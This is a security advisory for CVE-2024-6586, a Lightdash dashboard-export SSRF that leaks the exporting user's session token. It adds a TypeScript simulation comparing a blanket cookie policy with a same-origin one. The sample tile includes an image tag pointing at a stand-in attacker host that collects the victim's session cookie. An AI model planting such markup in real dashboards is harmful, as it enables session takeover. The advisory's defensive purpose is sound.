PT-2024-37738 · Lightdash · Lightdash

Kennethchiong · Published 2024-08-30 · Updated 2024-09-08

CVE-2024-6586

CVSS v3.1: 7.3 (High)
Vector: AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Name of the Vulnerable Software and Affected Versions: Lightdash version 0.1024.6

Description: Lightdash version 0.1024.6 allows users who hold the required permissions, such as Administrator or Editor, to create and share a dashboard that triggers a server-side request forgery (SSRF) when it is exported via a POST request to "/api/v1/dashboards//export". The forged request is sent with the exporting user's session token, so a threat actor who controls the destination of that request obtains the session token of any user who exports the shared dashboard and can then act as that victim in the application, resulting in session takeover. The attacker needs an account that can author dashboards, and the victim must perform the export themselves (UI:R in the vector above).

Recommendations: For Lightdash version 0.1024.6, update to version 0.1027.2. As a temporary workaround until the update is applied, restrict access to the "/api/v1/dashboards//export" endpoint. In addition, be cautious when exporting dashboards that contain HTML elements pointing at sources outside the Lightdash instance, because the export request to such a source is the path by which the session token leaves the application.
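The credential-leak pattern the description implies, as an added illustration that is neither Lightdash's code nor part of the advisory: it assumes (the page does not say so) that the export renders the dashboard server-side and attaches the exporting user's session cookie to the requests that render makes, so that a tile's HTML can steer one of those requests to an external host. The origin, the cookie name, the tile markup and the function names (extractResourceUrls, attachToEveryHost, attachOnlyToAppOrigin, renderForExport, leakedTo) are invented for the example. The hardened policy scopes the cookie to the application's own origin, which is the check a practitioner would want on any export or screenshot worker that runs with a user's credentials.

```typescript
// Added example: the session-leak pattern behind CVE-2024-6586, in miniature.
// Assumption (not stated on the page): the export renders the dashboard
// server-side and attaches the exporting user's session cookie to the
// requests that render issues. Every name here is hypothetical and
// none of it is Lightdash's code.

const APP_ORIGIN = "https://lightdash.example"; // hypothetical deployment origin
const SESSION_COOKIE = "session";               // hypothetical cookie name

// Pull every src/href target out of a tile's HTML and resolve it against the
// application origin. A deliberately small regex extractor; a real renderer
// would discover these through the DOM, including CSS and script loads.
function extractResourceUrls(html: string, base: string): string[] {
  const urls: string[] = [];
  const attr = /\b(?:src|href)\s*=\s*["']([^"']+)["']/gi;
  let m: RegExpExecArray | null;
  while ((m = attr.exec(html)) !== null) {
    try {
      urls.push(new URL(m[1], base).toString());
    } catch {
      // a malformed URL would never be fetched, so it cannot leak anything
    }
  }
  return urls;
}

// Vulnerable policy: the cookie rides on every request, whatever the host.
// This is what a blanket "extra header" on a renderer amounts to.
function attachToEveryHost(_url: string): boolean {
  return true;
}

// Hardened policy: credentials go only to the application's own origin.
function attachOnlyToAppOrigin(url: string): boolean {
  return new URL(url).origin === APP_ORIGIN;
}

interface OutboundRequest {
  url: string;
  cookie?: string;
}

// Simulated export render: the requests the renderer would issue for a tile,
// with the session cookie attached wherever the policy allows it.
function renderForExport(
  tileHtml: string,
  sessionToken: string,
  policy: (url: string) => boolean,
): OutboundRequest[] {
  return extractResourceUrls(tileHtml, APP_ORIGIN).map((url) =>
    policy(url) ? { url, cookie: `${SESSION_COOKIE}=${sessionToken}` } : { url },
  );
}

// Hosts outside the application that received the cookie: the set an
// attacker-controlled external source would be able to collect from.
function leakedTo(requests: OutboundRequest[]): string[] {
  return requests
    .filter((r) => r.cookie !== undefined && new URL(r.url).origin !== APP_ORIGIN)
    .map((r) => new URL(r.url).host);
}

// Constructed sample: a markdown/HTML tile an Editor could put on a shared
// dashboard. The first image is legitimate; the second points at a host the
// attacker controls.
const SAMPLE_TILE = `
  <h2>Quarterly revenue</h2>
  <img src="/api/v1/projects/demo/charts/1/preview.png" alt="chart">
  <img src="https://collector.attacker.example/pixel.gif" alt="">
`;

// Walk-through for a reader running the file directly.
const vulnerable = renderForExport(SAMPLE_TILE, "victim-session-token", attachToEveryHost);
const hardened = renderForExport(SAMPLE_TILE, "victim-session-token", attachOnlyToAppOrigin);
console.log("leaked under blanket policy:", leakedTo(vulnerable));   // [ 'collector.attacker.example' ]
console.log("leaked under same-origin policy:", leakedTo(hardened)); // []
```

The same-origin check is the minimum; a stricter worker would also refuse to fetch anything outside an allow-list while rendering, which closes the plain SSRF as well as the credential leak.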

Fix

Weakness Enumeration

Related Identifiers

CVE-2024-6586
GHSA-4H7X-6VXH-7HJF

Affected Products

Lightdash